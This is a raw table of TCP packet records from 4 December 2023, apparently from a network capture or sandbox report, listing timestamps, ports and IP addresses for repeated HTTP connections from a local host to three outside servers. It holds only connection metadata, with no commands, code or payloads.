                                                                                                                              Dec 4, 2023 15:26:37.070698023 CET8050189216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:37.070709944 CET8050189216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:37.070719004 CET8050189216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:37.070729017 CET8050189216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:37.070831060 CET5018980192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:37.070910931 CET5018980192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:38.446852922 CET5018980192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:39.462568998 CET5019080192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:39.572890043 CET8050190216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:39.573261976 CET5019080192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:39.573354006 CET5019080192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:39.714457035 CET8050190216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:39.714540958 CET8050190216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:39.714598894 CET8050190216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:39.714653969 CET8050190216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:39.714699984 CET8050190216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:39.714745998 CET8050190216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:39.714816093 CET5019080192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:39.714896917 CET5019080192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:41.086967945 CET5019080192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:42.102441072 CET5019180192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:42.212040901 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.212297916 CET5019180192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:42.213639021 CET5019180192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:42.376104116 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.376353979 CET5019180192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:42.376447916 CET5019180192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:42.486074924 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.486113071 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.486315012 CET5019180192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:42.486435890 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.486473083 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.486486912 CET5019180192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:42.486624002 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.486825943 CET5019180192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:42.487163067 CET5019180192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:42.540097952 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.540328026 CET5019180192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:42.597424984 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.597480059 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.597507000 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.597630024 CET5019180192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:42.597734928 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.597774982 CET5019180192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:42.597949982 CET5019180192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:42.598716974 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.598925114 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.599180937 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.599217892 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.599445105 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.599481106 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.649873018 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.707484961 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.707568884 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.707612038 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.707653999 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.736917973 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.737045050 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.737131119 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.737204075 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.737236023 CET5019180192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:42.737301111 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.737365961 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.737426996 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.738414049 CET5019180192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:42.738415003 CET5019180192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:42.739619970 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.739696980 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.739881039 CET5019180192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:42.789508104 CET5019180192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:42.847090006 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.847177982 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.847237110 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.847294092 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.847361088 CET5019180192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:42.847476959 CET5019180192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:42.848233938 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.848345041 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.848449945 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.848557949 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.848588943 CET5019180192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:42.848702908 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.848767042 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.848773956 CET5019180192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:42.848840952 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.848898888 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.848944902 CET5019180192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:42.849061012 CET5019180192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:42.850284100 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.850359917 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.850483894 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.850542068 CET5019180192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:42.898900986 CET5019180192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:42.899055958 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.899146080 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.899386883 CET5019180192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:42.956795931 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.956834078 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.956968069 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.956989050 CET5019180192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:42.957041025 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.957118034 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.957216978 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.957310915 CET5019180192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:42.957356930 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.957389116 CET5019180192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:42.957501888 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.957675934 CET5019180192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:42.958417892 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.958522081 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.958647013 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.958673000 CET8050191216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:42.958703995 CET5019180192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:42.958832026 CET5019180192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:43.727044106 CET5019180192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:44.742496014 CET5019280192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:44.852114916 CET8050192216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:44.852608919 CET5019280192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:44.852792978 CET5019280192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:44.981888056 CET8050192216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:44.981949091 CET8050192216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:44.981993914 CET8050192216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:44.982036114 CET8050192216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:44.982072115 CET8050192216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:44.982100010 CET8050192216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:44.982130051 CET8050192216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:44.982419014 CET5019280192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:44.982669115 CET5019280192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:44.982901096 CET5019280192.168.11.20216.40.34.41
                                                                                                                              Dec 4, 2023 15:26:45.092437983 CET8050192216.40.34.41192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:49.991477966 CET5019380192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:50.161050081 CET805019337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:50.161274910 CET5019380192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:50.161400080 CET5019380192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:50.330929041 CET805019337.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:50.331135988 CET5019380192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:51.662755966 CET5019380192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:52.678256989 CET5019480192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:52.856393099 CET805019437.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:52.856672049 CET5019480192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:52.856779099 CET5019480192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:53.034671068 CET805019437.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:53.034928083 CET5019480192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:54.365257025 CET5019480192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:55.380753040 CET5019580192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:55.550035954 CET805019537.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:55.550198078 CET5019580192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:55.551474094 CET5019580192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:55.551522970 CET5019580192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:55.551574945 CET5019580192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:55.720957041 CET805019537.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:55.721024036 CET805019537.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:55.721067905 CET805019537.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:55.721137047 CET5019580192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:55.721157074 CET805019537.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:55.721262932 CET805019537.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:55.721295118 CET5019580192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:55.721323967 CET805019537.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:55.721411943 CET805019537.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:55.721460104 CET805019537.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:55.721467018 CET5019580192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:55.721467018 CET5019580192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:55.721561909 CET805019537.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:55.721605062 CET805019537.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:55.721657991 CET805019537.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:55.891239882 CET805019537.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:55.891298056 CET805019537.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:55.891340017 CET805019537.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:55.891380072 CET805019537.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:55.891417980 CET805019537.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.067821026 CET5019680192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:58.245980024 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.246184111 CET5019680192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:58.246385098 CET5019680192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:58.425792933 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.425908089 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.425975084 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.426069021 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.426162958 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.426178932 CET5019680192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:58.426285982 CET5019680192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:58.426291943 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.426373005 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.426434040 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.426444054 CET5019680192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:58.426517963 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.426577091 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.426611900 CET5019680192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:58.426887035 CET5019680192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:58.604487896 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.604677916 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.604759932 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.604837894 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.604891062 CET5019680192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:58.605000973 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.605055094 CET5019680192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:58.605079889 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.605163097 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.605221033 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.605278969 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.605288982 CET5019680192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:58.605365038 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.605402946 CET5019680192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:58.605447054 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.605509996 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.605565071 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.605618954 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.605649948 CET5019680192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:58.605696917 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.605765104 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.605819941 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.605845928 CET5019680192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:58.605906963 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.605971098 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.606000900 CET5019680192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:58.606053114 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.606065989 CET5019680192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:58.606225014 CET5019680192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:58.783751965 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.783819914 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.783850908 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.783885002 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.784065008 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.784075975 CET5019680192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:58.784110069 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.784233093 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.784267902 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.784398079 CET5019680192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:58.784425974 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.784476995 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.784657955 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.784706116 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.784734011 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.784749031 CET5019680192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:58.784862995 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.784890890 CET5019680192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:58.785007954 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.785037041 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.785073996 CET5019680192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:58.785079956 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.785130024 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.785159111 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.785185099 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.785212040 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:26:58.785228968 CET5019680192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:58.785540104 CET5019680192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:58.785630941 CET5019680192.168.11.2037.97.254.27
                                                                                                                              Dec 4, 2023 15:26:58.963464022 CET805019637.97.254.27192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:03.800820112 CET5019780192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:27:03.917632103 CET8050197108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:03.917838097 CET5019780192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:27:03.918009043 CET5019780192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:27:04.034866095 CET8050197108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:04.168114901 CET8050197108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:04.168199062 CET8050197108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:04.168237925 CET8050197108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:04.168275118 CET8050197108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:04.168311119 CET8050197108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:04.168340921 CET8050197108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:04.168371916 CET8050197108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:04.168378115 CET5019780192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:27:04.168488979 CET5019780192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:27:04.168557882 CET5019780192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:27:05.425473928 CET5019780192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:27:06.440809011 CET5019880192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:27:06.558306932 CET8050198108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:06.558509111 CET5019880192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:27:06.558710098 CET5019880192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:27:06.675407887 CET8050198108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:06.802052021 CET8050198108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:06.802133083 CET8050198108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:06.802189112 CET8050198108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:06.802244902 CET8050198108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:06.802300930 CET8050198108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:06.802345991 CET8050198108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:06.802383900 CET5019880192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:27:06.802392960 CET8050198108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:06.802558899 CET5019880192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:27:06.802617073 CET5019880192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:27:08.065361977 CET5019880192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:27:09.080945015 CET5019980192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:27:09.198108912 CET8050199108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:09.198379993 CET5019980192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:27:09.199676991 CET5019980192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:27:09.199759960 CET5019980192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:27:09.317352057 CET8050199108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:09.317414999 CET8050199108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:09.317641020 CET5019980192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:27:09.317785978 CET8050199108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:09.317836046 CET5019980192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:27:09.317846060 CET8050199108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:09.317892075 CET8050199108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:09.318156958 CET5019980192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:27:09.318330050 CET5019980192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:27:09.434998989 CET8050199108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:09.435133934 CET8050199108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:09.435230970 CET8050199108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:09.435259104 CET5019980192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:27:09.435275078 CET8050199108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:09.435316086 CET8050199108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:09.435355902 CET8050199108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:09.435456991 CET5019980192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:27:09.435554028 CET8050199108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:09.435554028 CET5019980192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:27:09.435771942 CET5019980192.168.11.20108.179.192.34
                                                                                                                              Dec 4, 2023 15:27:09.435786963 CET8050199108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:09.435832024 CET8050199108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:09.435972929 CET8050199108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:09.436139107 CET8050199108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:09.552983999 CET8050199108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:09.553142071 CET8050199108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:09.553430080 CET8050199108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:09.553889990 CET8050199108.179.192.34192.168.11.20
                                                                                                                              Dec 4, 2023 15:27:09.554125071 CET8050199108.179.192.34192.168.11.20
